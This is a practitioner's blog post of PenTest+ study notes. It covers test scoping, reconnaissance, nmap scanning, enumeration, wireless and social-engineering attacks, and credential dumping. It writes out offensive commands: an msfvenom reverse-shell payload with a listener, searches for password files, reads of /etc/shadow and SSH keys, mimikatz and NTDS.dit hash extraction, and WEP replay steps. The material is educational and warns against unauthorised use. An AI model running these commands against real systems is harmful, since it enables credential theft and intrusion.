I created a PDF notebook a while ago when I decided on a whim to to the Pentest+. I have quite a few people ask me about getting into cyber security and well, you know when I was younger this stuff was just called IT mainly (IT + Infosec) so I thought let’s go test out the Pentest+. I did the course and exam in a week (whilst writing the notebook) (don’t think that’s a good idea but my objectives were more to make sure if I think it’s any good or not). Pleased to say I thought the course was good (I used pluralsight at 1.x speed) and the exam was fun (for an exam).

Hopefully this helps people explore the some of the world of offensive security and appsec.

A glimpse at mRr3b00t’s world

Hi, I’m Dan! Nice to meet you (if I don’t already know you)!

I’m an information technology and security professional (you know ‘teh Cyberz’) who has spent his career on a constant learning journey. I’ve planned, built, broken, reviewed and sometimes managed to break into a range of systems over the years. By day I help organisations improve their technology and security management (I do this with my own style, blending traditional management consultancy with hands on tech skills combined with a truck load of energy and passion) helping organisations change the way they do things (hopefully for the better :D)

I spent a lot of my non project time also creating community content, games and sometimes finding time to go and hax all the things in capture the flag games)

If for some reason you aren’t bored of my after reading some of my notes, feel free to come chat to me online, I mostly hangout on Twitter (

This is the first draft release of the notes I took whilst I did the Comptia Pentest+ course and exam over ~1-week period.

Everything in here is draft, if you find something that’s totally wrong please let me know, if you think there’s cool stuff I could add that’s great hit me up. If you think you could do it better, please go and make your own and share all the things with the world! I’m not a fan of gatekeeping and I try and share knowledge and content which I think can help people (I’ve got a few videos on

I really hope these notes are of at least some use, even if they are just interesting to see the process, I went through to randomly decided to do a course and exam in the space of a week!

I managed to sit a ~25 hour CBT course on Pluralsight and book/take the exam in a week. The exam I think I got 833 points in about 60 minutes. I’d highly recommend doing a lot more prep than I did, do lab work, learn the craft and the theory! (also there’s loads of bits of paper you can get, the fun part is the journey not the destination!)

Keep an eye out as well because I’ve trimmed some content out for this initial draft publish so there might be more to come in the future!

Be safe, don’t have shit passwords and stop exposing RDP to the net in an insecure manner!

Peace! – mRr300t


The modern world is filled with technology, the internet enabled global communications, miniaturisation has provided the world with even more pervasive and embedded technology services that are integrated into daily life. With this explosion of technology, we are currently in a world where technology is so integrated into our lives that the role technology places would be considered critical.

Banks, Power Plants, Factories, Healthcare Services, Restaurants, Shops, Transport Services, Cars, Phones, Point of Sale systems, Water Supplies, you name it, it probably relies on a computer to operate.

This e-book is designed to help people have a BASIC understanding of penetration testing. It is not a complete guide to HACKING THE PLANET and only touches on tools, techniques and practises that are used in the cyber realm to affect the CONFIDENTIALITY, INTEGRITY or AVAILABILITY of digital assets.

I’ve based the core of this on intel which will help people in foundational certificates such as the PenTest+ but these are also foundational areas which can support:

  • eJPT
  • OSCP
  • CEH

This isn’t an official guide, it’s not a HOW TO, it’s simply a collection of information I collected, curated and created whilst I was doing some exploration. I’ve tried to add my own spin to some areas, if I see something that’s totally missing or needs modernising, I’ve tried to call this out. It is not designed as a book to read, you will NEED to develop, train and grow your skills using labs and penetration testing platforms such as:

  • TryHackMe
  • HackTheBox
  • VulnHub
  • Vulnerable VMs
  • Vulnerable Training Tools (e.g. OWASP Juice Shop, OWASP BWA, OWASP Mutillidae 2)

And if you keep an eye out, maybe a PwnDefend CTF game!

I’d also highly recommend that you leverage either an online training service (such as Pluralsight or ITPRO.TV) or a formal instructor led course. Self study has some limitations, your view/viewpoint may


Using offensive security testing techniques without authorisation from the asset owner is almost certainly illegal. Use these at your own risk. Do NOT break the LAW!

The materials in this document are not endorsed by any third-party company. The content here is NOT specific to a single course, certification, framework

Realities of System Security Assurance Activities

  • Penetration testing is not a single task, there are many views, viewpoints and perspectives.
  • Penetration is not a silver bullet
  • When we look at spend on penetration testing vs revenue of a business the % is tiny, bear that in mind!
  • This is not Hollywood; you will NOT be raining in shells getting r00t and owning everything you see. Even if you can get a shell, your scope may indicate that’s the end of the test.
  • In unauthenticated black box external web tests you might see people say the expression ‘SHELLS are DREAMS’ – that’s because the % likelihood of you finding RCE or having enough time to successfully execute a potential vulnerability may be far more limited than you think.
  • Penetration testing is NOT red teaming
  • Red teaming also has a defined scope
  • You can do security testing without calling it a penetration test of RED team
  • Penetration testing without doing any other security assurance activity first is normally not very efficient or recommended
  • White box testing is generally more efficient
  • Report writing takes time (if you want to have a good report that is)
  • You might not find EVERY vulnerability (in fact I’d say it’s unlikely you will find EVERYTHING ever)
  • The landscape is fast moving secure today != secure tomorrow
  • Penetration testing is POINT IN TIME
  • You will almost certainly need help, built a network of trusted peers, colleagues and friends is a highly recommended thing to do
  • There are constraints (a lot more than people think of)
  • Security testing requires a broad and deep level of experience not only with exploitation but also to be able to articulate remediations and mitigations.

Learning Modules

There’s a whole heap of things you need to know about conducting a penetration test, and it may come to a surprise to many but there’s a lot of logistics, planning and paperwork that’s involved.

I’m not going to be exhaustive here (or highly verbose) but rather highlight some key areas for you to think about.


Penetration testing isn’t normally conducted in house; therefore, you should be aware that there is a requirement for services to be SOLD. So, consider things like the following:

  • Margin/Revenue
  • Market Positioning
  • Costs
  • Timescales
  • Certifications
  • Standards

Sales is not easy but it’s critical that the sales process is conducted in a manner then ensures both the recipient and the provider (that’s you) get value. Realise there are constraints but also realise that in sales you can say no. We are here to help people, not just tell them yes. Not everyone in the world is good at scoping their own requirements let along designing a penetration test that’s valid for their specific scenario so communication here is key.


Test Focus

  • Objective
  • Compliance

Test Types

  • Black Box
  • Grey Box
  • White Box
  • Hybrid

Test Scope Definition

  • Authenticated, Unauthenticated
  • Social Engineering
  • Denial of Service, Stress Testing
  • Web, Application, API, Infrastructure, Hardware, Wireless
  • Inclusions
  • Targets and Test Types
  • Exclusions
  • Constraints
  • Times of Testing


  • Authorisations and Waivers
  • Scope Agreement
  • Rules of Engagement
  • Scheduling
  • Communications
  • Escalations

The Penetration Testing Project

  • Passive Recon
  • Active Recon
  • Vulnerability Assessment
  • Penetration
  • Exploitation
  • Post Exploitation

This is not the ONLY flow, and, it’s iterative and can jump around.

  • Post Test Clean-up

Reporting, Findings and Recommendations

  • Exec Summary
  • Categorisation of Findings
  • Priority
  • Standards such as CVSS
  • Safe handling of information and documents


  • Post Testing and report creation debrief
    • Ensure key sponsor is kept up to date and in the loop
    • Brief wider team
      • Two-way communication flow

Penetration Testing Tools – The basics

We have put a list of tools that are covered in the PenTest+ course (but these are also applicable to any penetration testing service or course). Where possible links to tools and download locations have been provided. Clearly you can deploy a security testing distro such as Kali Linux, Parrot etc. buy you may want to simply install Ubunt or use Windows and WSL 2.

Open Source Intelligence Gathering Tools

Network and Vulnerability Scanning Tools

Credential Testing Tools

Debugging Tools

Software Assurance Tools

Wireless Testing

Web Proxy Tools

Social Engineering Tools

Remote Access Tools

Network Tools

Mobile Tools

Misc Tools

Lab Environment


  • An internet connection
  • A Host System that supports running a type 2 hypervisor or Cloud IaaS provider
    • Enough CPU resources
    • 16GB RAM
    • 1TB Storage
  • A type-2 hypervisor such as:
    • Oracle Virtual Box
    • Hyper-V
    • VMWare Workstation
    • VMWare Fusion

Guest Operating Systems

  • Kali Linux
  • Black Arch
  • Parrot OS
  • Windows 7 Pro Eval
  • Windows 10 Enterprise Eval
  • Windows Server 2016 Eval
  • Windows Server 2019 Eval

Getting ISOs etc. isn’t always simple however you can use tools such as RUFUS:

from the vendor sites or using this tool:

Vulnerable Pre-Made Targets

Multipliable (


Extras For learning



Penetration Testing Standards and Frameworks

Types of Penetration Test

  • Objective Based
  • Target Based
  • Compliance Based


  • PTES
  • NIST


Penetration Testing Phases


Scoping, Project Setup, Legal & Regulatory, Scheduling, Rules of Engagement

It’s not all pew pew bang bang, there is a lot to be considered, planned, agreed and scheduled.

Penetration Testing Phases

Post Exploitation

Report Creation and Delivery

Key Stakeholder and Team Playback

This is (in my opinion) an undervalued activity area but also one that does not receive the attention it deserves. This part is the key element to a security assurance testing project, a lot of people consider the report to be the outcome of a pen test, and from a standard point of view that might be the case, however what I’ve know is that unless you are simply ticking a box, they key value is ensuring the recipient of the test understands not only what the findings mean tot them in terms of business risk, likelihood, confidence and impact but also how to develop remedial or mitigation strategies (this includes advising on how to avoid creation of the vulnerabilities in the first place).

It’s important not only to ensure the recipients understand the findings but also ensure that additional business contextualisation occurs, not every finding will be acted upon and sometimes that for a very valid business reason (other times you may need to really outline what the potential impacts may be). Either way, communication is key! Remember the objective is to improve the security posture through identification of weaknesses.

Pentest – Recon

Our goal here is to understand as much about the target as possible both from a passive perspective and an active perspective.

Tool bag

You are also going to want to use several services such as:

  • Public facing websites
  • GitHub Repositories
  • Social Media Sites
  • Search Engines
  • News Sites/Press Releases
  • Job Descriptions/Job Adverts

We are also going to want to use other tools such as:

The Internet Archive WayBack machine:

A screenshot of a computer

Description automatically generated

Recon Types and Focuses

With regards to penetration testing there are 2 types of recon:

  1. Passive Recon
  2. Active Recon

Passive Recon

During passive recon we don’t directly touch the target environment. Instead we leverage alterative data sources to enumerate information about the target organisation and scope.

Search Engines

Example – Google Dorking

Before we hit some of the syntax there’s a cool db and loads of web resources on this topic:


  • site:
  • filetype:
  • inurl:
  • intitle:


  • OR
  • AND


Graphical user interface, text, application

Description automatically generated with medium confidence

Graphical user interface, text

Description automatically generated with medium confidence


We can search dns using a tool as simple as “nslookup”

Other tools exist such as:


Maltego comes in a variety of shapes and sizes, Community, Classica, XL etc.

Maltego is a great tool at collecting, collating, creating and visualising data using graphs for open source intelligence gathering and analysis.


Spiderfoot isn’t included in PenTest+ to my knowledge but it should be! There’s both an open source version of spider foot but also a hosted commercial version called Spiderfoot-HX


Shodan is a search engine for systems, devices and services.

A screenshot of a computer

Description automatically generated with medium confidence


Recon-NG is a great tool that also integrates into a large range of tools via API keys.

The Harvester

Documenting Findings

Once you have gathered intelligence on you target you need to filter it and ensure the data you are creating is supportive of your objectives.

You are trying to find intel that helps:

  • User lists/Email Lists
  • Organisation Data
  • Organisation Structure
  • Suppliers
  • Remote Access Services
  • Physical Locations
  • Network and DNS information
  • Products and Services

Active Recon

Here our systems connect to the target services.

Network Scanning

  • Nmap
  • Nikto
  • Metasploit

Nmap (Network Mapper)

Nmap basic scan scans the most common TOP 1000 ports (not the first 1-1000 ports)

Common scan types

  • Connect Scan (Full Scan) – This does a 3-way handshake
  • SYN Scan (Half Open) – This does the first step of the handshake sending SYN, gets a SYN-ACK and then never completes the conversation
  • Tracert (Conducts a traceroute)
  • Ping (uses ICMP protocol to echo the target)
  • UDP Scan (super-fast UDP scan =”nmap -sU –defeat-icmp-ratelimit” required nmap 7.4)
  • NULL Scan (TCP Packets with no FLAGS set)
  • FIN Scan

A common scan people use:

nmap -vvv -O -sV -sC -sS -T4 -oA results

This scan will be verbose (x3), will detect operating system version (-O), Service Vesions (-sV)

Scanning ranges

Nmap {Scan Options}

-sn = ping sweep

-PR = arp scan
-PA = Non existent TCP Connections

XMAS Tree Scan


OS Identification Through TTL

Different OS’s respond to ICMP echo with different TTLS

There’s load there but you just need to know the common ones like:

  • Common Windows Versions
  • Linux Versions









Packet Crafting

Creation of bespoke packets (hping, hping3 etc.)

  • Create
  • Edit
  • Play
  • Decode

Network Mapping Tools

  • ZenMAP
  • SpiceWorks
  • WhatsUPGOld
  • TheDUDE
  • Nagios
  • SolarWinds

Mapping the Network with Metasploit

  • Metasploit Framework
  • Community
  • Express
  • Pro

A picture containing diagram

Description automatically generated

Now using Metasploit is fairly simple but it’s far too in depth for here!


Included with KALI but no longer in development

Cobalt Strike

A commercial offering created by the author of Armitage

Other C2 Servers

  • Empire
  • Coventant

Enumerations Basics

Banner Grabbing

We can grab banners using tools such as telnet, nc, nmap etc.

To enumerate a banner with nmap we use -sV

We can also enumerate banners and service information manually using tools like telnet, netcat/nc etc.




  • SMTP Port is 25
  • Encrypted SMTP uses port 587
  • VRFY is used to check a mailbox
  • EXPN is used to check a group


FTP Attacks include BOUNCE. A BOUNCE attack uses one FTP server to MiTM another FTP Server.

On box enumerations

Using tools interactively / from an authenticated point of view such as:

Netstat (Windows and Unix Based Systems)

A picture containing table

Description automatically generated

Basic Local Windows Enumeration

Command Execution (using cmd.exe shell)





Whoami /privs

echo %path%

Ipconfig /all

Route print

Arp -a

Net use


Net Start

Net users

Net localgroup

Net user administrator

Net localgroup administrators

Net localgroup ‘remote management users’

Net localgroup ‘remote desktop users’

Net localgroup ‘Backup Operators’

Net localgroup administrators

netstat -ano

netsh firewall show state

schtasks /query /fo LIST /v

tasklist /SVC


wmic qfe get Caption,Description,HotFixID,InstalledOn

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

dir /s *pass* == *cred* == *vnc* == *.config* ==*.txt*

findstr /si password *.xml *.ini *.txt *.config *.xlsx *.docx

reg query HKCU /f password /t REG_SZ /s

reg query HKLM /f password /t REG_SZ /s

wmic process list brief | find “winlogon”

wmic service get name,displayname,pathname,startmode |findstr /i “auto” |findstr /i /v “c:\windows\\” |findstr /i /v “””

Clearing Up Output (cmd.exe)

| #pipe output

> #output to file (overwrite)

>> #output to file (append)

| findstr #find a string in the output

PowerShell (using PowerShell)

Get-Command #show all commands


Get-LocalGroupMember administrators

Get-ChildItem -Path c:\ -Include *.docx,*.doc,*.xlsx,*.xls,*.config,*.ini -file -recurse -erroraction silentlycontinue | select-string password


Basic Linux Enumeration

There are a ton of tools you can use from Enum4Linux, the Metasploit modules, smbclient, ftp, grep.. honestly there’s a lot so lets’ look at some common tools:

  • Enum4Linux
  • Impacket
  • Metasploit
  • Nmap (we won’t cover that again)

Enum4Linux -a -u administrator -p Pa55w0rd1


There are hundreds of moudles


Description automatically generated

Using Metasploit to hunt for SMB shares on a range (change the CIDR range on RHOSTS to suit)


search smb_enumshares

use auxiliary/scanner/smb/smb_enumshares





Cool msf commands

setg #setglobal – makes the option stick between modules e.g. setg LHOST

set verbose true # enables verbose output

#RUN A LISTENER from the CLI on one line

msfconsole -x “use exploit/multi/handler;set PAYLOAD windows/meterpreter/reverse_tcp;set LHOST;set ExitOnSession False;run”

On Box Enumeration (Linux)

BASH (Basic Enumeration)


ip a

uname -a

netstat -antp

netstat -anup
df -a
dpkg -l

ps aux

ps aux | grep root

ps -ef | grep root

ps -ef

cat /etc/services

cat /etc/passwd

cat /etc/shadow

apache2 -v

mysql –version

cat /etc/groups
cat /etc/resolv.conf
nmap –version
find / -name nc 2>/dev/null

crontab -l

grep -i password /etc/my.ini

cat /etc/sudoers

cat ~/.bash_history

cat ~/.ssh/id_rsa

find / -perm -u=s -type f 2>/dev/null

find / -perm -g=s -type f 2>/dev/null

METASPLOIT (Basic Enumeration)


Post Modules require a SESSION to be established:






Local Shell Test

The following test just let’s you connect to youself on your loopback address on TCP port 9999

Metasploit Console

use exploit/multi/handler

set PAYLOAD linux/x64/meterpreter/reverse_tcp

set LPORT 9999


set ExitOnSession FALSE

run -j

Local Linux Machine (x64 Architecture)

#Create a Payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT=9999 -f elf > shell.elf

#set as executeable

chmod +x shell.elf

#run the payload


You should see a local connection

A screenshot of a computer

Description automatically generated with medium confidence

A screenshot of a computer

Description automatically generated with medium confidence

A screenshot of a video game

Description automatically generated

We are now in a position where we can run POST modules:

use post/linux/gather/enum_system

set SESSION 2 #change the ID to match your session number – check sessions -l



SMB Prior to Server 2003 on Windows machines but also older versions of SAMBA also have this vulnerability.

To enumerate this, we can simply use:

Net use \\target\ipc$ /U: “” “”

Net view \\target

WebServer Enumeration

HTTP Response codes

  • HTTP 401
  • HTTP 403
  • HTTP 404
  • HTTP 200
  • HTTP 402

These can be enumerated using a browser and developers’ mode, a web proxy tool like BURP, FIDDLER or OWAS ZAP or using tools like nmap etc.

nmap –script=http-enum

nmap –script=http-php-version

nmap –script=http-wordpress-enum

Vulnerability Scanning


  • OpenVAS
  • Nessus
  • Qualys
  • Rapid7 Nexpose

I’d recommend downloading evals/trials and checking these out.


Common Scripting/Programming Languages

Generally Interpreted

  • Bash (tied to OS:NIX)
  • Batch (Tied to OS DOS/WINDOWS)
  • PowerShell
  • Python
    • Python2
    • Python3
  • Perl
  • Ruby
  • PHP
  • VBScript
  • VBA
  • Javascript


  • C
  • C++
  • .net
  • Visual Basic
  • GoLang
  • Java

Penetration Testing Documentation Tools

  • CVSS Calculators
  • CWE
  • DRADIS Community
  • DRADIS Pro
  • AttackForge

Report/Note Taking Tools

There are literally tons of tools that can be used for note taking and report writing, some of these include:

  • Microsoft Word (I wrote this e-book in MS WORD, I write my reports in WORD too)
  • Microsoft OneNote
  • CherryTree
  • EverNote
  • Notion

Diagramming Tools

  • Microsoft Visio (Windows)
  • Smart Draw (OS X)
  • OmniGraffle (OS X)
  • Archimate

Social Engineering & Non ‘Technical’ Attacks

  • Non-Technical Attacks
  • Dumpster Diving

RFID Duplicators

  • Keysys


  • Social Engineering
    • Target Eval
    • Pretext/Pretexting (back story and context)
    • Psychological Manipulation
    • Building Relationships
    • Motivations
      • Authority
      • Scarcity
      • Urgency
      • Social Proof
      • Likeness
      • Fear
    • Impacts
  • USB Drop
    • In a test by a university a USB drop showed the following stats:
      • 297 Drives Dropped
      • 45% Phoned Home
    • Build by loading a USB drive using:
      • Autorun.inf
      • Embedded malware in documents, binary etc.
      • Use a HID attack (see Rubber Ducky)
    • Make them attractive
      • Use themed drives
      • Add logos
      • Add labels
      • Add keys
    • Think about there they are placed
    • Task: Place a malicious Binary on a USB drive:
      • Example: use msfvenom to create a payload
      • Demo this connecting to a listener
  • Physical Attacks
  • RFID Attacks
  • Phishing
    • Phishing Types
      • Email (Phishing)
      • SMS (SMISHING)
      • Phone (Vishing)
      • Social Media
      • Pharming
      • Spear Phishing/Whaling/Gaming/Live Chat
      • Physical Phishing
    • Social Engineering Toolkit (SET)
    • Evilginx
    • GoPhish
  • Lockpicking
  • Motion Sensors
  • Alarms

Phishing Task

Task: Use Social Engineering Toolkit to demo a PISHING attempt using the credential harvester method to clone a site. Send a phishing email to yourself on a sperate account using a public email service like or google mail.

Physical Attacks

Physical Controls

  • Conduct Recon
  • Dumpster Dive
  • Visit the target
  • Photograph the Target
  • Deliver an implant
  • Steal a Device
  • Steal badges/ID
  • Fences
  • Gates
  • Tailgating
  • Lockpicking
  • Look for ways to bypass controls

Door Access Controls

  • Compressed Air/Vapes/Paper to bypass motion sensory or magnetic locks
  • Reach Around/Under
  • Lockpicks

Enumeration, Vulnerability Identification

Picking a vulnerability scanning

  • Opens Source vs Commercial
  • On Premises vs Cloud
  • Documentation and Outputs


  • Golismero
  • Sparta
  • Kali
    • Nmap
    • Nikto
  • Nessus
  • Qualys
  • Rapid7 Nexpose

Picking a vulnerability scanning Tool

Open source vs Commercial

  • Pick one to suit your business requirements
  • Consider features
  • Look at false positive rates
  • Look at reporting and output formats etc.
  • Scope of features

Cloud vs On Premises

  • Pick solutions to fit your requirements
  • Do you need to test air gapped networks?
  • Ensure plugins are up to date

Interpreting Output

Asset Categorisation

  • The act of grouping assets
    • Organization/Defender View
    • “Pentester” View


The act of going through and evaluating the threat those pose to the target organisation.

False Positives

When a service is incorrectly identified as being vulnerable when it is in fact, not vulnerable.

Common Themes

Conditions that re-occur all the time such as:

  • Behaviour Patterns
  • Naming standard patterns
  • Policies being ignored
  • Weak physical security
  • Inadequate Training
  • Weak security configurations
  • Poor Software development practises
  • Insecure network protocols (e.g. TELNET, FTP)
  • Obsolete cryptography


Ranking vulnerabilities in terms of priority for exploitation/impact and/or remediation.

Mapping & Prioritisation

  • Mapping customer assets and relationships
  • Mapping processes, people, activities etc.
  • Consider times of events, activities etc.

Creating a ‘picture’ of the attack surface landscape.

Attack Techniques

  • Denial of Service Attack
  • Hijacking
  • Man-in-The-Middle
  • Credential reuse
  • Password Attacks
  • Social Engineering
  • Injection


  • Social Engineering
  • Planting a Device/Implant
  • Remote Access
  • Wireless Attacks
  • Conspiring with an internal threat actor

Exploits & Payloads


An exploit is the action/mechanisms to exploit a vulnerability (e.g. Unauthenticated RCE, Path Traversal, Code Injection)


A payload is the code that will run on the target e.g.

  • Meterpreter

Staged vs Upstaged Payloads

A staged payload is small payload which downloads the full payload.

An untagged payload simply runs following the exploit.

Cross Compiling Code

Exploit Modification

  • Debugging
  • Shell Code creation

Exploit Chaining

The act of chaining multiple exploits together.

Proof of Concepts

An exploit that is created to highlight and validate a vulnerability and exploit chain.

Deception Tactics

  • Creating a distraction
    • Social Engineering
    • Other Attacks
    • Distracting event

Password Attacks

  • Brute Force
  • Wordlists
  • Hybrid
  • Rainbow Tables

Network Penetration Testing


Ethernet & TCP/IP Networks

  • Sniffing
    • Network cards including Wireless cards must be in promiscuous mode
    • TPC, IP, ARP, ICMP, IGMP, LDAP, SNMP, SMTP, SMB, FTP DNS DHCP, POP3, IMAP, UDP, and HTTP can all be sniffed (any cleartext protocol)
  • Eavesdropping
  • ARP Poisoning
    • The act or sending our AC address out identifying as the default gateway to route traffic through our host
      • IP forwarding
      • DNS Poisoning
      • Ettercap
  • TCP Session Hijacking
    • The user/machine must have authenticated before
    • Requires a clear text protocol (e.g. TELNET/RLOGIN)
    • Increasing TCP sequence numbers must be detected and guest (they are pseudo random)
    • Signing is not in use (e.g. SMB singing is not ENABLED)
    • ARP Poison
    • Send FIN packets to the target to disconnect the client
    • Requires you to spoof IP and MA
    • Tools include:
      • Tsight
      • Juggernaut
      • Hunt
  • Browser Hijacking
    • Cookie Sniffing (ARP Poison and HTTP session theft
    • Session Fixation (Cookie is assigned before authentication)
    • Failure to timeout the cookie of destroy the session
    • Predictable sessions token
    • Cross Site Scripting (XSS)
    • Session Variable Overloading
  • Man-in-the-middle (MiTM) Attacks
  • Brute force Attacks
    • Brute Force
    • Dictionary
    • Tools
      • Aircrack-ng
      • THC-Hyrda
      • Medusa
      • Patator
      • John-The-Ripper
      • Cain and Abel
      • Hashcat
      • L0phtcrack
      • 0phtcrack
      • Metasploit
  • Denial of Service and Load Testing
    • Deny Service
    • Fail Open
  • Pass-The-Hash
    • Requires us to get a copy of the NTLM/NTLMv2 HASH (not netNTLM)
  • VLAN Hopping
    • MAC Table Overflow
    • Trunk Ports
      • Switch
      • Client Side
    • Tools
      • Frogger

Network Protocol Exploits


Has been exploited for a long time!

  • MS06-087
  • EternalBlue (MS17-010)
  • Eternal Romance
  • Eternal Champion
  • Eternal Synergy


  • Community String Defaults (v1 & v2)
    • Public
    • Private
  • Tools
    • Hydra
    • Medusa
    • nmap
    • BOF
    • Metasploit


  • Tools
    • Hydra
    • Medusa
    • Nmap


  • DNS Cache Poisoning
    • Tools
      • Ettercap
      • Metasploit
      • DNSChef
      • ArpPwner

Name Resolution

Wireless Networks


  • Aircrack-ng
  • WIFI Pumpkin
  • Wifi Pineapple

Attacks and Techniques

  • Wireless Sniffing
  • WAP
  • Replay
  • WEP
  • Fragmentation
    • PRGA Attack
  • Jamming
    • Check the legality of running this attack
    • De-Auth
    • Tools
      • Wifi Jammer Python Script
      • Aircrack-ng
      • Wireless Pineapple
  • Tools
    • Aircrack-ng
  • Evil Twins
    • Creation of an attacker owned network with the same SSID as the target environment
    • To detect use Wigle, Kismet, Airmon-ng etc.
      • Tools
        • Wifi Pineapple
  • WPS Attacks
    • WPS uses 7 characters
    • It only checks the first 4 digits before checking the last 3
    • The time to crack is very small
  • Bluetooth
    • Bluejacking Attacks (around 30 feet range)
      • Transmit images, messages, videos etc.
      • Send contacts with spoofed contact names (the target sees the spoofed name as a message)
      • Can be used in connection with phishing/cred harvesting etc.
    • BlueSnarfing
      • Gather data
      • OBEX Push Profile (OPP)
      • OBEX GET
      • Get files such as contacts etc.

Lab Activities

  • WAP Replay Attack
  • WPA2 Cracking
  • IRL: Bettercap

Replay Steps

airmon-ng check kill

#enable monitor mode (promiscuous)

airmon-ng start wlan0

airodump-ng wlan0mon

#Find a WPA network to replay

airodump-ng –bssid BSSIDMAC -c 6 –write output wlan0mon

#start the replay attack by authenticating (-1 = fake authentication)

aireplay-ng -1 0 -a BSSIDMAC -e SSIDName wlan0mon

#send ARP requests (type3)

aireplay-ng -3 -b BSSIDMAC wlan0mon

aireplay-ng -1 0 -a BSSIDMAC -e SSIDName wlan0mon

# this attack takes some time and requires other clients

#now we crack the hashes

aircrack-ng -b BSSIDMAC output-01.cap

Fragmentation Attacks

airmon-ng check kill

aireplay-ng -5 -b BSSIDMAC -e SSIDName -h SOURCEMAC wlan0 –write output

packetforce-ng -0 -a BSSIDMAC -h SOURCEMAC -y output-01.cap -w prgaOutput

aireplay-ng -r prgaOutput wlan0


#enable monitor mode



#kill network management services

airmon-ng check kill

#enable monitor mode

airmon-ng start wlan0


airodump-ng wlan0mon

#run with output saved (csv, pcap etc.)

airodump-ng wlan0mon -w pwnWIFI

#RUN Airodump Scan Visualizer –

#Load the CSV

Specialist Systems

Mobile Systems

  • Android
  • IOS

Industrial Control Systems (ICS) and SCADA (supervisory control and data acquisition)


  • Control Physical Devices
  • Tools
    • ICSExploit


Supervisory control and data acquisition

  • SCADA Manages ICS

Embedded Systems

  • Industrial Systems

Real -Time OS’s (RTOS)

Often does not include security features.

Internet of Things (IoT)

Mirai botnet created from DVRs and Baby Monitors etc.

  • Buffer Overflows
  • Command Injection
  • SQL injection
  • Syn Floods etc.

Point of Sale Systems

  • Tablets
  • Custom Devices
  • Payments taken (so PCI-DSS may be in scope)
  • Some powered by PIs etc.

Host based Exploitation

Exploiting hosts includes systems which include:

  • Windows
  • MAC OSD (BSD Based)
  • Android
  • IOS

Linux Package Managers

  • Apt (Debian/Unbuntu) – Advanced Packaging Tool
  • Aptitude Package Manager (Debian/Ubuntu) (this is different to apt in that it’s a GUI)
  • Dpkg (Debian/Ubuntu)
  • yum (CENTOS) -Yellowdog Updater, Modified
  • yast (SUSE)
  • RPM (REDHAT LINUX) – Redhat package manager)
  • Pacman (Arch Linux)

Windows Systems and Vulnerabilities

  • Windows is written in a language based on C (this has no bounds checking which can lead to vulnerabilities)
  • Requires developers to code securely
  • Closed Source (Source code is private)
  • Windows 10 is > 50 million lines of code
  • Reliant on Vendor for Patching (however 3rdn party micro patching is a thing)

Types of Vulnerability

  • Remote Code Execution
  • Buffer/Overflow
  • Denial of Service (DoS)
  • Memory Corruption
  • Privilege Escalation
  • Information Disclosure
  • Security Feature Bypasses (e.g. UAC Bypass)

Web Application Vulnerabilities

  • Cross Site Scripting (XSS)
  • Directory Traversal
  • XSRF (Cross site request forgery)

Go and see the OWASP top 10

Common Windows Exploit Examples

These are old vulnerabilities which might be useful for the exam, but it’s also good to know the history of common vulnerabilities:

  • IIS 5.0 Unicode
  • IIS 5.0 WebDAV
  • RPC DCOM (MS08-067) Buffer Overflow RCE using RPC
  • SMB NetAPI
  • Null sessions
  • LM password hash weaknesses

More modern examples

Dumping Hashes & Password Cracking

  • Hashes (stored in SAM database)
  • SYSKEY (Stored in the registry)
  • Active Directory Passwords
    • Stored in NTDS.DIT
      • MD4 (NT hash)
      • LM
      • DES_CBC_MD5
      • AES256_CTS_HMAC_SHA1
      • MD5 (WDIGEST)
      • Reversable Encrypted Clear Text Password
  • Certificates
  • Kerberos Tickets
  • LSA Secrets


  • Steal creds from files (e.g. GPP, SYSPREP)
  • Dump creds form running processes
  • Dump processes from memory (Hibernation files, VM memory files)
  • Dump creds from SAM
  • Dump creds from registry
  • Dump from NTDS.dit
  • Domain Controller Replication (Mimikatz/Impacket)
  • Keylogging
  • Social Engineering

Windows Credential Dumping

Dump the SAM

Registry export

Reg save hklm\sam

Reg sve hklm\security

#read these using mimikatz



Think about running mimikatz on an attacker owned system to avoid dropping to disk or being detected/having to disable antivirus

Dumping Passwords Live

(run as admin)

Dump LogonPasswords


#enable debug privs


#log to a file

Log mimilog.log

#dump logon passwords/hashes


Dump SAM File Kerberos Tickets


#enable debug privs


#log to a file

Log mimilog.log

#dump logon passwords/hashes



Dumping NTDS.DIT

Note: Here we need to create a COPY of ntds.dit (using shadowcopy, NTDS util or NinjaCopy etc. or you can take this from a backup)

#Copy the NTDS file and SYSTEM files from the target

#example of NTDSutil

ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\temp’ q q

#Extract hashes using PowerSploit

Get-ADDBAccount -All -DBPath ‘ntds.dit’ -BootKey SYSTEM

#Extract using Impacket

impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

Common nix Vulnerabilities

  • Based on C
  • Open Source but development is inconsistent
  • Linux and Android allow sideloading
  • Common Vulnerabilities
    • POODLE
    • Heartbleed
    • XSS/XSRF
    • SQL Injection
    • SMB Overflows
    • Enumeration


  • GNU is an operating system
  • Linux is a KERNEL (A component of the OS)

Common Exploits

  • DirtyCow (Copy on Write)
  • Five Year Bug (2009)
  • Remote Root Flaw
  • Insecure SUDO configuration
  • Insecure SUDO binaries
  • Sticky bits
  • SUID BIT set

Password Cracking for LINUX

Credentials are stored

  • /etc/passwd
  • /etc/shadow

On older linux distros they were just stored in cleat text in /etc/passwd

  • Tools: Unshadow can be used
  • Meterpreter: hashdump
  • Mimipenguin (memory dump)
  • Password Hashes can be passed as well e.g. SAMBA
  • Key Logging

Password Hash Types (NIX)

$1 = MD5

$2a = Blowfish

$5 = SHAR-256

$6 = SHAR-512

Protocol Exploitation


  • Unnecessary Services
    • IIS in Windows 2000
  • SMB 1.0 (Changed in Windows 10 Anniversary Build and greater)
  • Domain Account Password Caching
    • 10 Domain Logins Cached
    • Default accounts
      • Administrator (SID starting “S-1-5-21” and ending “-500”)
      • Guest (SID starting “S-1-5-21” and ending “-501”)
  • Weak Default Security Logging


  • User home permissions
  • World-readable and writeable directories/files
  • Insecure mount/export options
  • Service with weak default settings
  • Apps with weak default settings

Protocols and Services


  • Supports multiple protocols and configurations
  • Provides Software for most services (from Microsoft)


  • Supports multiple protocols and configurations
  • Depends on 3rd parties

LAB Activity


  • Install windows roles and features
    • Install IIS
    • Install NFS


  • Install Apache2
  • Install Terminator


Windows 7

